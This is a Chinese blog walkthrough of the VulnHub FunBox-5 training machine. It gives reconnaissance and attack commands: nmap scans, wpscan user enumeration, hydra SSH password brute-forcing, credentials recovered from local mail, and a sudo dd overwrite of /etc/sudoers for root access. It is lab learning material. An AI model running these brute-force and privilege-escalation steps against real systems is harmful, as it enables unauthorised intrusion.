vulnhub靶场之FunBox-5

最新推荐文章于 2024-05-22 16:07:41 发布
最新推荐文章于 2024-05-22 16:07:41 发布
阅读量583 收藏 14
点赞数 10
分类专栏: [ vulnhub靶机通关篇 ] 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58091216/article/details/138732600
版权

一.环境搭建

1.靶场描述

Lets separate the script-kids from script-teenies.

Hint: The first impression is not always the right one!

If you need hints, call me on twitter: @0815R2d2 Have fun...

This works better with VirtualBox rather than VMware

This works better with VirtualBox rather than VMware.

2.靶场下载

https://www.vulnhub.com/entry/funbox-next-level,547/

image-20240505210150176

3.靶场启动

image-20240505210220611

二.信息收集

1.探测IP地址

nmap -sP 192.168.2.0/24

image-20240505210631152

arp-scan -l

image-20240505210650840

我们探测出来IP地址为192.168.2.8

2.探测端口及服务

nmap -p- -sV 192.168.2.8

image-20240505211214614

开启了80端口,服务为Apache2
开启了22端口,服务为ssh

通过端口我们可以知道,又是ssh登录

三.渗透测试

1.访问web服务

http://192.168.2.8

image-20240505211508157

可以看到是一个apache2页面

2.扫描web服务

1)nikto扫描网站结构

nikto -h http://192.168.2.8

image-20240505211735325

扫描到一个robots.txt敏感目录

2)dirsearch扫描

这里IP地址变为192.168.2.9
dirsearch -u http://192.168.2.9 -e * -x 403 --random-agent

image-20240505212342222

扫描出来一个http://192.168.2.9/drupal

3)dirb扫描

dirb http://192.168.2.9

image-20240505212903776

3.渗透测试

1)访问robots.txt

http://192.168.2.9/robots.txt

image-20240505213108046

http://192.168.2.9/Thinking

image-20240505213143759

没有任何有用的信息

2)访问drupal目录

http://192.168.2.9/drupal

image-20240505213436812

我们发现重定向了192.168.178.33,没有什么用,我们进行扫描drupal试试

image-20240505214734508

我们可以看到cms是wordpress,那么我们使用wpscan进行爆破,因为开启了22端口,我们可以进行ssh登录

3)wpscan爆破

wpscan –url http://192.168.2.9/drupal/index.php –wp-content-dir=http://192.168.2.8/drupal/wp-content/ -e

image-20240505215430043

我们可以看到爆破出来2个用户名,一个是admin,一个是ben

4)hydra爆破

hydra -l admin -P  /usr/share/wordlists/rockyou.txt  ssh://192.168.2.9

image-20240505215553186

我们可以看到爆破不出来,那么我们爆破另一个

hydra -l ben -P  /usr/share/wordlists/rockyou.txt  ssh://192.168.2.9

image-20240505215603591

爆破出来密码是pookie

5)ssh登录

ssh ben@192.168.2.9

image-20240505215848216

我们可以看到登录成功

我们在根目录下可以看到mail目录,但是里面的文件我们没有权限查看

image-20240505220022514

image-20240505221052245

提权也提权不了,我们换一个思路

6)邮件服务

发现 ben 用户在 mail 组中 会不会有邮件发服务呢 netstart -anpt

image-20240505220408960

我们可以看到110端口是开放的吗,我们使用110端口进行查看

现存在邮件服务 通过110端口 连接本地 telnet 127.0.0.1 110发现可以, 而且有三封信 发现账号密码:adam/qwedsayxc!

image-20240505220805479

image-20240505220859984

image-20240505220915396

我们使用adam进行登录

ssh adam@192.168.2.9

image-20240505221713112

我们可以看到登录成功

7)提权

切换用户查看权限 id发现在sudo组 查看sudo -l发现了dd,de,df都可以sudo提权 只有dd可以使用

image-20240505221921830

提权方法查询网站:GTFOBins

image-20240505221959108

该命令可以写入具有root权限的文件,执行命令进行写入文件/etc/sudoers,设置adam用户具有全部的特权命令

LFILE=/etc/sudoers
echo "adam    ALL=(ALL:ALL) ALL" | sudo dd of=$LFILE

image-20240505222138478

可以使用find命令进行提权,提权成功

image-20240505222232759

获取flag

image-20240505222354615

至此获取到了所有得flag,渗透测试结束。

MS02423
关注
  • 10
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
funbox界面需求文档-20160414.docm
05-08
funbox界面需求文档-20160414.docm
Vulnhub靶机:FunBox 5
qq_48904485的博客
01-24 955
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:FunBox 5(10.0.2.30)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/funbox-next-level,547/
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox5(NEXT LEVEL)
Aluxian_的博客
09-09 572
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。
vulnhub Funbox: Next Level(funbox5)
箭雨镜屋
04-06 831
渗透思路:nmap扫描 ---- dirb扫描 ---- wpscan枚举用户名 ---- hydra爆破ssh登录密码 ---- 登录pop3端口查看邮件 ---- pkexec提权
vulnhub靶场FunBox-3
qq_58091216的博客
05-05 233
我们不知道靶场的ip地址,但是我们知道靶场网段是192.168.2.0。我们可以看到登录成功,我们查看权限是tony,那么我们进行提权。我们上传一句话木马,可以看到上传成功,我们进行反弹shell。我们发现了一个用户名和一个md5加密的密码,我们进行解密。我们在/home/目录下发现了tony,我们进行查看。既然我们知道了ssh登录的密码,那么我们进行登录即可。我们可以看到扫描出来一个数据库,我们进行访问。我们发现了pkexec,我们进行提权。我们发现登录成功,我们寻找漏洞。我们可以看到ssh登录的密码。
vulnhub靶场FunBox-1
qq_58091216的博客
05-01 371
但是我们发现不能使用,那么我们就换一个思路,进行解决,我们知道22端口是开启的,我们使用ssh进行登录。虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.2.0/24。我们可以想到是IP地址和域名没有进行绑定,我们进行绑定即可。首先我们使用joe进行登录,但是没有发现有用的信息。我们可以发现一个404.php,我们进行利用即可。我们查看id,发现不是root权限,我们进行提权。爆破出来2个用户名和密码,我们进行登录查看。我们可以看到/home目录,我们进行查看。
Vulnhub靶场Funbox
qq_69775412的博客
11-08 615
信息收集 -> 获取目标IP端口扫描 -> 获取目标IP的端口开放情况及服务版本信息Web端口 -> 目录扫描获取敏感信息,如果是CMS就通过版本信息搜索历史漏洞,如果不是就手工测试其他服务端口 -> 通过服务版本在漏洞库搜索相关漏洞信息通过FTP漏洞获取ROOT权限。之所以说这道题简单,是因为msf攻击成功后直接是root权,不需要其他的提权操作,所以说对新手来说的话还是比较简单的。
vulnhub靶场FunBox-6
qq_58091216的博客
05-16 879
如果我们不断刷新页面的话,可以看到这是一个定时任务,查看网站标题Gamble hall翻译过来就是赌博大厅,副标题是CLOSED,过了一段时间副标题会变化,CLOSED 和 OPENED是不停变化,猜测有一个定时任务。使用用户名密码登录网站,发现登录失败,返回主页面查看,发现网站副标题状态为CLOSED,再等到该标题为OPENED的时候登录试试,登录成功。我们猜测是域名和IP地址的绑定,这个靶场特别讨厌,它是一个定时任务。我们可以看到无法连接,想到题目的提示,我们需要绑定IP地址和域名。
vulnhub靶场FunBox-2
qq_58091216的博客
05-02 440
新建一个 MS02423文件夹把下载的压缩包文件都放进去发现里面都是加密的 id_rsa再把 /usr/share/wordlists/rockyou.txt字典 复制进去。我们可以看到报错了,那么这个办法是行不通的,我们换一个思路,我们查看ftp访问。我们可以看到成功绕过,我们查看home目录下的文件。我们看到好多的压缩包而且都是加密的,我们进行爆破。我们可以看到权限是root,我们直接查看flag。我们通过密码获取到tom的私钥,我们进行登录。我们知道tom的密码了,那么我们直接进行登录。
vulnhub靶场FunBox-7
qq_58091216的博客
05-18 380
进入家目录 发现有五个用户(我们想到题目的提示hydra) 直接尝试暴力破解 使用 hydra 一个一个试 最后爆破得到:goat/thebest。我们可以看到有文件上传的地方,但是这里直接上传一句话木马是没有作用的,这里我们修改mini.php文件。靶场IP地址我们不知道,但是我们知道网段是192.168.2.0/24。我们可以看到多了一个/mini.php页面,我们进行访问。都没有扫描到有用的信息,我们换一个字典进行扫描。可以看到提权方式是2个,但是需要root密码。发现是一个apache2页面。
funxbox-test:Funbox的测试任务
05-08
Funbox的测试任务 要启动它: npm安装 凉亭安装 吞咽 喝一口 gulp测试(用于测试) 通过在文本框中输入名称并按Enter,可以添加新的航点。 此后: 输入的路径点显示在已添加点列表的末尾; 标记会出现在地图...
i-FunBox 中文版 v1.96.938.649
04-27
软件介绍 iFunBox是一款小巧的iPhone, iPad 和 iPod Touch文件管理软件。无须越狱和任何破解,可以直接使用,不安装任何守护进程。 界面类似于windows资源管理器,以简练时尚的窗口方式浏览和管理iPhone、iPad、iPod...
funbox:测试和工具程序
02-11
滑稽
docker-funbox:具有有趣的终端命令和ASCII艺术的Docker容器
05-04
Docker Funbox 带有有趣怪异终端命令和ASCII艺术的容器。 特色 按字母顺序: 洛尔卡特 喵喵猫 管道 RIG-随机身份生成器 sl (不要与ls混淆) 洗手间 VLC S 基本用法 $ docker run --rm -it wernight/funbox _ ...
HCIP-Datacom-ARST自选题库_02_网络安全【道题】
2301_80961833的博客
05-20 687
为了防止黑客通过MAC地址攻击用户设备或网络,可将非信任用户的MAC地址配置为黑洞MAC地址,过滤掉非法MAC地址。中间人攻击或IP/MAC Spoofing攻击都会导致信息泄露等危害,且在内网中比较常见,为了防止中间人攻击或IP/MACSpoofing攻击,可以采取以下哪些配置手段?多远题461/805、为了防止仿冒DHCP服务器接入网络,可以在交换机上开启DHCP Snooping功能,配置步骤包括以下哪些选项?开启DHCP Snooping检查DHCP REQUEST报文中CHADDR字段的功能。
CTF网络安全大赛简单web题目:eval
Pythonit教程网
05-17 901
(错误控制运算符)等可能引发安全问题的函数。这个PHP脚本有几个关键部分,但首先,它是不安全的,因为使用了。红客网:blog.hongkewang.cn。只需要在web的url后面加上参数“题目来源于:bugku。一道简单web的题目。
出海战略中的网络技术应用:SOCKS5代理、代理IP与网络安全
最新发布
Together_GPT的博客
05-22 356
在全球市场中,SOCKS5代理、代理IP以及全面的网络安全措施,是跨界电商和游戏行业企业实现成功出海的关键技术支柱。通过结合使用加密技术,如SSL/TLS,SOCKS5代理能够为数据传输提供一个安全的隧道,进一步增强数据的保密性和完整性。游戏企业则可以减少游戏延迟,提升玩家的游戏体验。同时,企业还可以根据不同地区的文化和语言特点,定制化地推送内容,提升用户的参与度和满意度。利用SOCKS5代理和代理IP,虽然可以在一定程度上增强安全性和隐私保护,但还需要更多的措施来构建全面的网络安全体系。
Web安全:企业如何抵御常见的网络攻击?
m0_66326520的博客
05-16 768
针对网站的攻击有多种形式,攻击者既可以是业余黑客,也会是协同作战的职业黑客团伙。最关键的一条建议,就是在创建或运营网站时不要跳过安全功能,因为跳过安全设置可能会造成严重后果。虽然不可能完全消除网站攻击风险,但你至少可以缓解遭攻击的可能性和攻击后果的严重性。遭受攻击后,不仅需要及时的响应处置还需要避免同类事件的发生,因此事后的复盘分析尤为重要,做好安全防护才是最高效的网络攻击解决方案。
FUNBOX: UNDER CONSTRUCTION!
08-16
FUNBOX: UNDER CONSTRUCTION! 是一个面向初学者的基础级 BootToRoot 机器,难度较低。它有两个标志,可以在该链接下载:https://www.vulnhub.com/entry/funbox-under-construction,715/。通过主机发现工具netdiscover可以进行信息探测,命令如下:netdiscover -i eth0 -r 192.168.187.0/24。此外,在查看cron.sh文件时,可以进行base64解码,然后切换到root用户并获得flag。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [vulnhub刷题记录(FUNBOX: UNDER CONSTRUCTION!)](https://blog.csdn.net/admin_gt/article/details/126722192)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [vulnhub--Funbox: Under Construction!](https://blog.csdn.net/qq_39991837/article/details/119374087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MS02423

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值